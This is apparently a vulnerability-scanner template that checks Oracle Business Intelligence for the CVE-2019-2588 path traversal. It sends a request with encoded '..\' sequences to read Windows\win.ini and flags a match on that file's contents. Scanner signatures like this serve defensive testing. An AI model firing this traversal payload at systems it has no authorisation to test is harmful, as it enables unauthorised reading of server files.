id: oracle-business-lfi
info:
  name: Oracle Business Intelligence Path Traversal - CVE-2019-2588
  risk: High
  confidence: Tentative

params:
  - root: "{{.BaseURL}}"

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    detections:
      - >-
        StatusCode() == 200 && StringSearch("body", "for 16-bit app support")

references:
  - link: https://www.exploit-db.com/exploits/44752
